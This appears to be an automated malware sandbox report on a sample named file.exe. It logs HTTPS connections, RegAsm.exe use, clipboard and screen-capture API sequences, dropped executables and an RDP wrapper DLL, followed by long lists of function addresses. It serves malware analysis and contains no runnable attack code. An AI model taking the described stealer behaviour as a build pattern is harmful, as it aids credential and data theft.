Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57931
Source: unknown	Network traffic detected: HTTP traffic on port 57919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57902
Source: unknown	Network traffic detected: HTTP traffic on port 57916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57919
Source: unknown	Network traffic detected: HTTP traffic on port 57933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57916
Source: unknown	Network traffic detected: HTTP traffic on port 57927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57913
Source: unknown	Network traffic detected: HTTP traffic on port 57887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57876
Source: unknown	Network traffic detected: HTTP traffic on port 57902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57882
Source: unknown	Network traffic detected: HTTP traffic on port 57884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57880
Source: unknown	Network traffic detected: HTTP traffic on port 57890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57913 -> 443

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:57876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.6:57877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.6:57903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:57904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:57908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:57912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.6:57917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:57918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.6:57919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:57925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.6:57926 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: BGDGHJEHJJ.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: GIJEGDAKEH.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: 66f5db9e54794_vfkagks[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C57B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C57B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C57B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C51F280

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02890C40	0_2_02890C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D933	3_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D1C3	3_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C472	3_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D561	3_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041950A	3_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DD1B	3_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CD2E	3_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B712	3_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5135A0	3_2_6C5135A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58545C	3_2_6C58545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C525440	3_2_6C525440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C555C10	3_2_6C555C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C562C10	3_2_6C562C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58AC00	3_2_6C58AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58542B	3_2_6C58542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53D4D0	3_2_6C53D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5264C0	3_2_6C5264C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C556CF0	3_2_6C556CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51D4E0	3_2_6C51D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C526C80	3_2_6C526C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5734A0	3_2_6C5734A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57C4A0	3_2_6C57C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53ED10	3_2_6C53ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C540512	3_2_6C540512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52FD00	3_2_6C52FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C550DD0	3_2_6C550DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5785F0	3_2_6C5785F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C539E50	3_2_6C539E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C553E50	3_2_6C553E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C534640	3_2_6C534640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C562E4E	3_2_6C562E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51C670	3_2_6C51C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C586E63	3_2_6C586E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C557E10	3_2_6C557E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C565600	3_2_6C565600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C579E30	3_2_6C579E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51BEF0	3_2_6C51BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52FEF0	3_2_6C52FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5876E3	3_2_6C5876E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C535E90	3_2_6C535E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C57E680	3_2_6C57E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C574EA0	3_2_6C574EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C557710	3_2_6C557710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C529F00	3_2_6C529F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C546FF0	3_2_6C546FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51DFE0	3_2_6C51DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5677A0	3_2_6C5677A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C538850	3_2_6C538850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53D850	3_2_6C53D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55F070	3_2_6C55F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C527810	3_2_6C527810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55B820	3_2_6C55B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C564820	3_2_6C564820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5850C7	3_2_6C5850C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53C0E0	3_2_6C53C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5558E0	3_2_6C5558E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5460A0	3_2_6C5460A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C53A940	3_2_6C53A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C56B970	3_2_6C56B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58B170	3_2_6C58B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52D960	3_2_6C52D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C555190	3_2_6C555190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C572990	3_2_6C572990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54D9B0	3_2_6C54D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51C9A0	3_2_6C51C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C559A60	3_2_6C559A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C558AC0	3_2_6C558AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C531AF0	3_2_6C531AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55E2F0	3_2_6C55E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C58BA90	3_2_6C58BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52CAB0	3_2_6C52CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C582AB0	3_2_6C582AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5122A0	3_2_6C5122A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C544AA0	3_2_6C544AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C515340	3_2_6C515340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C52C370	3_2_6C52C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C55D320	3_2_6C55D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5853C8	3_2_6C5853C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C51F380	3_2_6C51F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5CAC60	3_2_6C5CAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C69AC30	3_2_6C69AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C686C00	3_2_6C686C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5BECC0	3_2_6C5BECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C61ECD0	3_2_6C61ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C68ED70	3_2_6C68ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EAD50	3_2_6C6EAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C748D20	3_2_6C748D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74CDC0	3_2_6C74CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5C4DB0	3_2_6C5C4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C656D90	3_2_6C656D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C65EE70	3_2_6C65EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6A0E20	3_2_6C6A0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5CAEC0	3_2_6C5CAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C660EC0	3_2_6C660EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C646E90	3_2_6C646E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C682F70	3_2_6C682F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C62EF40	3_2_6C62EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5C6F10	3_2_6C5C6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700F20	3_2_6C700F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C69EFF0	3_2_6C69EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5C0FE0	3_2_6C5C0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C708FB0	3_2_6C708FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5CEFB0	3_2_6C5CEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C694840	3_2_6C694840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C610820	3_2_6C610820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C64A820	3_2_6C64A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6C68E0	3_2_6C6C68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5F8960	3_2_6C5F8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C616900	3_2_6C616900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DC9E0	3_2_6C6DC9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5F49F0	3_2_6C5F49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6509A0	3_2_6C6509A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C67A9A0	3_2_6C67A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6809B0	3_2_6C6809B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C63CA70	3_2_6C63CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C678A30	3_2_6C678A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C66EA00	3_2_6C66EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C63EA80	3_2_6C63EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6C6BE0	3_2_6C6C6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C660BA0	3_2_6C660BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C5D8460	3_2_6C5D8460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C624420	3_2_6C624420
Source: C:\ProgramData\BGDGHJEHJJ.exe	Code function: 7_2_00CA0C40	7_2_00CA0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004103A8	11_2_004103A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00447D38	11_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00401000	11_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004480B0	11_2_004480B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00449120	11_2_00449120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040C1C0	11_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042D250	11_2_0042D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040A231	11_2_0040A231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044A230	11_2_0044A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004012C7	11_2_004012C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004452E0	11_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00415352	11_2_00415352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00407450	11_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00405470	11_2_00405470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409402	11_2_00409402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004404AB	11_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044A510	11_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004115B0	11_2_004115B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041D610	11_2_0041D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00449620	11_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040A6E0	11_2_0040A6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040B6B0	11_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043F700	11_2_0043F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041E71A	11_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044B720	11_2_0044B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004087F0	11_2_004087F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00428833	11_2_00428833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004338C0	11_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004408E6	11_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004038A0	11_2_004038A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00434990	11_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040ABA0	11_2_0040ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042EBBC	11_2_0042EBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00437CD0	11_2_00437CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00449D22	11_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00407E50	11_2_00407E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00427E6C	11_2_00427E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00437F30	11_2_00437F30
